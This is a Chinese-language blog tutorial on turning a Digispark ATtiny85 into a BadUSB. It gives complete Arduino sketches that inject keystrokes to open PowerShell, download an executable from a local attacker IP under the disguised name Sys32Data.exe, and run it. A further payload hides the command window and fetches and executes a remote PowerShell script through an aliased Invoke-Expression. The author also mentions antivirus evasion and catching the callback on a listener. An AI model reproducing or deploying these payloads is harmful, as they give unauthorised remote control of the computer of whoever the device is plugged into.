badusb
Badusb
- 官网地址下载Windows——64位下的,或者用kali自带的:
https://www.arduino.cc/en/software
- 安装Digispark (Attiny85)开发板驱动。
https://github.com/lilygo/digispark-attiny85-driver-install
- 打开Arduino软件,点击文件中的首选项,附加开发板管理器网址填入::
http://digistump.com/package_digistump_index.json
- 工具-->开发板-->开发板管理器,我这里选择的是DIGISTUMP AVR BOARDS,然后就是下载一会,需要挂代理
- 插入开发板后可以在设备管理器这里看到效果:
- 代码如下:
#define kbd_es_es
#include <DigiKeyboard.h>
void setup() {}
void loop()
{
int d=1000;
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(d);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(600);
DigiKeyboard.print("powershell");
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(d);
DigiKeyboard.print("$client = new-object System.Net.WebClient");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(d);
DigiKeyboard.print("$client.DownloadFile('http://192.168.130.5/go-sc2.exe','Sys32Data.exe')");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.print("start Sys32Data.exe");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(d);
DigiKeyboard.print("exit");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for(;;){}
}
- 先编译一下,如果没有报错就可以继续:
- 点击这里,编译上传到开发板中,需要在60s之内插入badusb:
- 等待烧录完成即可:
- kali开启Apache(处于演示没使用服务器),将放在www目录用以下载:
- 设置好监听上线后恶作剧一下看效果:
- 我的做了免杀,去框被杀概率高,后续可以继续改进。win10上效果如下:
#define kbd_es_es
#include <DigiKeyboard.h>
void setup() {}
void loop()
{
int d=1000;
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(d);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(600);
DigiKeyboard.print("powershell");
DigiKeyboard.delay(50);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(d);
DigiKeyboard.delay(1600);
DigiKeyboard.print("$client = new-object System.Net.WebClient");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(d);
DigiKeyboard.delay(1600);
DigiKeyboard.print("$client.DownloadFile('http://192.168.130.19:80/shell.exe','Sys32Data.exe')");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1600);
DigiKeyboard.print("start Sys32Data.exe");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(d);
DigiKeyboard.print("exit");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
for(;;){}
}
http://192.168.130.19:80/shell.exe
//payload
if (onetimeOrForever == 0)
{
delay(1000);
Keyboard.begin();//开始键盘通讯
delay(1500);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.println("CMD /t:01 /k @ECHO OFF && MODE CON:cols=15 lines=1"); //使用最小化隐藏cmd窗口
//cmd /c start /minCMD /C START /MIN POWERSHELL -W HIDDEN
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(1300);
Keyboard.println("echo set-alias -name rookie -value Invoke-Expression;rookie(new-object net.webclient).downloadstring('http://IP/payload.ps1') | powershell -");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
delay(1000);
Keyboard.begin();//开始键盘通讯
delay(1500);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.println("notepad.exe"); //打开记事本
delay(500);
Keyboard.println(" $$$$ ");
delay(500);
Keyboard.println(" $$ $$");
Keyboard.println(" $$ $$");
Keyboard.println(" $$ $$");
Keyboard.println(" $$ $$");
Keyboard.println(" $$ $$");
Keyboard.println(" $$ $$");
Keyboard.println(" $$$$$$ $$$$$$");
Keyboard.println(" $$$$$$ $$ $$ $$ $$$$");
Keyboard.println(" $$ $$$$ $$ $$ $$ $$");
Keyboard.println(" $$ $$ $$ $$ $$ $$");
Keyboard.println(" $$ $$ $$ $$");
Keyboard.println(" $$$ $$ $$");
Keyboard.println(" $$ $$");
Keyboard.println(" $$$ $$");
Keyboard.println(" $$ $$");
Keyboard.println(" $$$ $$");
Keyboard.println(" $$ $$$");
Keyboard.println(" $$$ $$");
Keyboard.println(" $$ $$");
Keyboard.println(" $$$ $$$");
Keyboard.println(" $$ $$");
Keyboard.println(" $$$$$$$$$$$$$$$$$$$$");
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
Keyboard.end();//结束键盘通讯
FRfFg42F9LvRu2B
标签:DigiKeyboard,badusb,sendKeyStroke,delay,KEY,Keyboard,println From: https://www.cnblogs.com/bktown/p/badusb-bjmij.html